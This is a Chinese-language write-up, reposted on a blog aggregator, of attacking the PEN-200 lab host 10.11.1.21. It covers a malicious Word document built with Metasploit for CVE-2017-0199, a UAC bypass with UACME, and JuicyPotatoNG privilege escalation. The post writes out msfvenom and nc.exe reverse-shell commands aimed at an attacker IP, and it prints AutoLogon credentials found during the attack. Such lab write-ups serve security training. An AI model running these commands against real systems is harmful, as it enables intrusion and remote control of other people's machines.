【pen200-lab】10.11.1.21(实际获得22权限)

news2024/12/24 2:18:53

pen200-lab 学习笔记

【pen200-lab】10.11.1.21


🔥系列专栏:pen200-lab
🎉欢迎关注🔎点赞👍收藏⭐️留言📝
📆首发时间:🌴2022年11月27日🌴
🍭作者水平很有限,如果发现错误,还望告知,感谢!

文章目录

  • pen200-lab 学习笔记
    • 80
    • CVE-2021-40444
    • CVE-2017-0199
    • 提权
    • uac绕过
        • 查看是否存在
        • 查看等级

nmap -p- --min-rate 10000 -A 10.11.1.21
21/tcp    open  ftp           FileZilla ftpd
| ftp-syst: 
|_  SYST: UNIX emulated by FileZilla
80/tcp    open  http          Microsoft IIS httpd 10.0
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: SV Corporation Editorial Process
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds  Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
3389/tcp  open  ms-wbt-server Microsoft Terminal Services
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
47001/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open  msrpc         Microsoft Windows RPC
49665/tcp open  msrpc         Microsoft Windows RPC
49666/tcp open  msrpc         Microsoft Windows RPC
49667/tcp open  msrpc         Microsoft Windows RPC
49668/tcp open  msrpc         Microsoft Windows RPC
49669/tcp open  msrpc         Microsoft Windows RPC
49670/tcp open  msrpc         Microsoft Windows RPC
49671/tcp open  msrpc         Microsoft Windows RPC

80

在这里插入图片描述
所以我可以按照给出的凭据登陆ftp并上传一些doc或者docx文件
他将处理

editor/MyEditWork

在这里插入图片描述能够成功登陆,但是并没有东西存在

CVE-2021-40444

https://github.com/lockedbyte/CVE-2021-40444

我能够看到我的主机服务器已经能够得到一些返回信息了
在这里插入图片描述这似乎是正常的利用,我将进一步探索

但是这好像无法利用
于是我尝试了别的方法

CVE-2017-0199

最终找到了这个

use exploit/windows/fileformat/office_word_hta
set payload windows/meterpreter/reverse_tcp
set FILENAME shell.doc
set SRVHOST 192.168.119.175 
set LHOST 192.168.119.175 
run

生成的恶意doc文件在

/root/.msf4/local/shell.doc

我们ftp上传即可
等待一会将会获得shell

在这里插入图片描述我可以获得一个proof.txt但这是错误的

在这里插入图片描述

提权

whoami /priv
无效的可用权限

在这里插入图片描述而后上传winpeasall.exe
枚举出了以下的一些可用内核提权,不过这是最后一步,我将试图找到服务配置的问题

����������͹ Looking for AutoLogon credentials
    Some AutoLogon credentials were found
    DefaultUserName               :  svcorp\alice
    DefaultPassword               :  ThisIsTheUsersPassword01

uac绕过

当我输入whoami /groups时,我发现了他,具体内容可以在
查阅

https://book.hacktricks.xyz/windows-hardening/authentication-credentials-uac-and-efs/uac-user-account-control

在这里插入图片描述我将按照hacktrack进行实践

查看是否存在

1就是存在。0就是关闭,是0的话可以直接执行反弹exe绕过

REG QUERY HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System\ /v EnableLUA

在这里插入图片描述

查看等级

REG QUERY HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System\ /v ConsentPromptBehaviorAdmin

在这里插入图片描述
在这里插入图片描述现在我们就要用UACME来进行uac绕过了

https://github.com/hfiref0x/UACME

用它需要自己编译,还需要先知道一些东西

查看自己的版本

powershell [environment]::OSVersion.Version

在这里插入图片描述在这里找到关于自己的版本信息

https://en.wikipedia.org/wiki/Windows_10_version_history

在这里插入图片描述

1607/14393

在这里插入图片描述

49,53,54,58,61

一共找到了5个模块

而后在我们的windows机器中,打开vs
我用的是2019

在这里插入图片描述
全部设置成142,这是按照官方文档中的叙述操作的

在这里插入图片描述看这里
在这里插入图片描述
然后生成

在这里插入图片描述
会告诉你生成路径
而后传递到靶机中
执行

Akagi64.exe 54 C:\Users\alice\Desktop\root.exe

root.exe是一个反弹shell
如下生成

msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.119.175 LPORT=7777 -f exe -o root.exe

这个id我忘记是哪一个成功了,一共5个,我都来了一遍,反正只需要改一个id
在这里插入图片描述

SeImpersonatePrivilege                 
SeCreateGlobalPrivilege 
SeChangeNotifyPrivilege

我将利用

SeImpersonatePrivilege     
https://github.com/antonioCoco/JuicyPotatoNG/releases/tag/v1.1

.\JuicyPotatoNG.exe -t * -p "cmd.exe" -a "/c C:\\Users\\alice\\Desktop\\nc.exe -e cmd 192.168.119.175 443" -l 443

当然你需要先上传一个nc.exe
在这里插入图片描述本地开一个443监听

但是最后得到了22机器的权限
我感觉很错乱
或许这是一个域环境,我认为是这样的
但是我这个弄了很久,我需要休息
21再说吧

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/58773.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

算法导论24章单源最短路径—Bellman-Ford算法 Dijkstra算法

松弛操作 松弛操作就是判断从现在s到v的路径更近,还是我从s到u再到v更近,选一个更近的走。 松弛操作的例子 松弛是唯一导致最短路径估计和前驱结点变化的操作 Bellman-Ford算法 第一个循环,循环V-1次,每次循环对所有的边都松弛一…

Python数据分析-matplotlib

目录 一、折线图:plt.plot() 1.1 plt.plot()基本用法 1.2 设置坐标轴范围:plt.axis([xmin,xmax,ymin,ymax]) 1.3 plt.plot()绘制多个图形 1.4 linewidth设置线条宽度 1.5 使用plt.plot()的返回值设置线条属性 1.6 plt.setp()修改线条性质 1.7 对…

软件测试的几种方法

1、从是否关心内部结构来看 (1)白盒测试:又称为结构测试或逻辑驱动测试,是一种按照程序内部逻辑结构和编码结构,设计测试数据并完成测试的一种测试方法。 (2)黑盒测试:又称为数据驱动测试,把测试对象当做看不见的黑盒…

讲透金融风控建模全流程(附 Python 代码)

信贷风控是数据挖掘算法最成功的应用之一,这在于金融信贷行业的数据量很充足,需求场景清晰及丰富。 信贷风控简单来说就是判断一个人借了钱后面(如下个月的还款日)会不会按期还钱。更专业来说,信贷风控是还款能力及还…

SQL 汇总统计及GROUP BY

SQL 汇总统计1、汇总统计2、GROUT BY3、如何对分组统计的结果进行过滤? GROUP BY HAVING4、如何对分组统计的结果进行排序?GROUP BY ORDER BY5、介绍SELECT语句中各个子句的书写顺序6、备注: 上方用到的表1、汇总统计 介绍几个聚集函数 有…

电脑误删Path环境变量后前端如何重新配置所需变量

需求背景 : 当时公司需要我们安装一款软件 , 按照操作文档需要配置一下 Path 环境变量 , 但当时的云桌面操作系统是 window7系统 , 当时配置时并不知道新的变量配置时需要在前面一个的后面加 “ ; ” 来间隔开来…

【目的:windows下VS2017/2022使用MSVC编译GLFW库】

目的:windows下VS2017/2022使用MSVC编译GLFW库 环境: 系统:Win10 环境:VS2017 64bit步骤: 1.下载GLFW源码 官网链接https://www.glfw.org/download.html, 下载glfw的源码,解压到本地&#x…

考研数据结构大题整合_组二(TJP组)

考研数据结构大题整合 目录考研数据结构大题整合二、TJP组TJP组一TJP组二TJP组三二、TJP组 TJP组一 四、画图/计算/证明/算法分析(30分) (1)证明题(8分) 如果一棵树有n1个度为1的结点,n2个度为…

(四)Vue之数据绑定

文章目录数据绑定单向数据绑定双向数据绑定Vue学习目录上一篇:(三)Vue之模板语法 数据绑定 Vue中有2种数据绑定的方式: 1.单向绑定:数据只能从data流向页面。2.双向绑定:数据不仅能从data流向页面&#…

著名书画家、中国书画院院士李适中

著名书画家、中国书画院院士李适中 李适中 著名书画家、中国书画院院士 版画艺术家 文物复制专家 中国文物学会会员单位创始人 文化部科技进步奖获得者 艺术简历 李适中,1943年生,安徽颍上人,著名书画家、中国书画院院士。李适中先生师从著名…

Vue3+nodejs全栈项目(资金管理系统)——前端篇

文章目录创建项目项目初始化使用element-plus设置Register和404组件搭建element注册表单验证表单和按钮加载动画和消息提醒路由守卫和token过期处理配置请求拦截和响应拦截解析token并存储到vuex中设计顶部导航设置首页和个人信息设置左侧导航栏展示资金管理页面添加按钮编辑和…

返回当前系统串口名称

主要针对当前的usb转串口进行了穷举。 方便判断串口对应哪个设备。 返回串口名称 类对象,(包含了参考网址,以及对其进行了修改,防止出现蓝牙端口) using System; using System.Collections.Generic; using System.L…

VMware-KVM安装

目录 VMware-KVM安装 一、kvm虚拟化平台 KVM 网络管理(以NAT网卡为例[ens33]) VMware-KVM安装 一台Centos7、一个winSCP上传文件工具; 搭建KVM平台 一、kvm虚拟化平台 1 cat /etc/hosts ##查看主机…

ecology修改Reisn的JDK目录

修改resin运行JDK: 用文本编辑器打开resin/bin/resin.sh文件,将JAVA_HOME改为要设置的JDK路径。

springboot(spring)整合redis(集群)、细节、底层配置讲解

文章目录一.springboot整合redis.1.引入依赖.2.添加配置.3.使用封装对象举例二.细节讲解出现问题,堆外内存溢出解决方案,切换客户端三.补充原理.一.springboot整合redis. 1.引入依赖. <dependency><groupId>org.springframework.boot</groupId><artifact…

Spring中过滤器(Filter)和拦截器(Interceptor)的区别和联系解析

在我们日常的开发中&#xff0c;我们经常会用到Filter和Interceptor。有时同一个功能。Filter可以做&#xff0c;Interceptor也可以做。有时就需要考虑使用哪一个比较好。这篇文章主要介绍一下&#xff0c;二者的区别和联系。希望给大家进行选择的时候&#xff0c;提供一些帮助…

DSP/BIOS的基本介绍

DSP/BIOS的基本介绍 DSP/BIOS是一个简易的实时嵌入式操作系统&#xff0c;主要面向实时调度与同步、主机/目标系统通信&#xff0c;以及实时监测等应用&#xff0c;具有实时操作系统的诸多功能&#xff0c;如任务的调度管理、任务间的同步和通信、内存管理、实时时钟管理、中断…

(十)再探反向传播和神经网络优化

文章目录1.背景介绍2.神经网络的模型3.神经网络中的参数更新初探3.1随机查找取最优3.2局部随机查找参数更新3.3 沿着梯度反方向更新4.链式法则与反向传播5.梯度方向的参数更新策略6.学习率退火6.1学习率衰减策略基础6.2 二阶优化方法6.3自适应学习率方法参考资料欢迎访问个人网…

Java基础之接口与抽象类区别

Java基础之接口与抽象类区别一、Java基础之接口与抽象类二、抽象类和最终类三、Java移位运算符四、局部变量为什么要初始化一、Java基础之接口与抽象类 一个子类只能继承一个抽象类, 但能实现多个接口抽象类可以有构造方法, 接口没有构造方法抽象类可以有普通成员变量, 接口没…

minikube helm 安装 jenkins

文章目录1. 准备条件2. 安装 helm3. 部署 jenkins3.1 创建 namespace jenkins3.2 创建存储卷 jenkins-volume3.3 创建 service account & RBAC3.4 定制 jenkins-values.yml3.5 安装 jenkins3.6 登陆 jenkins“Jenkins是一个著名的可扩展开源 CI/CD 工具&#xff0c;用于自动…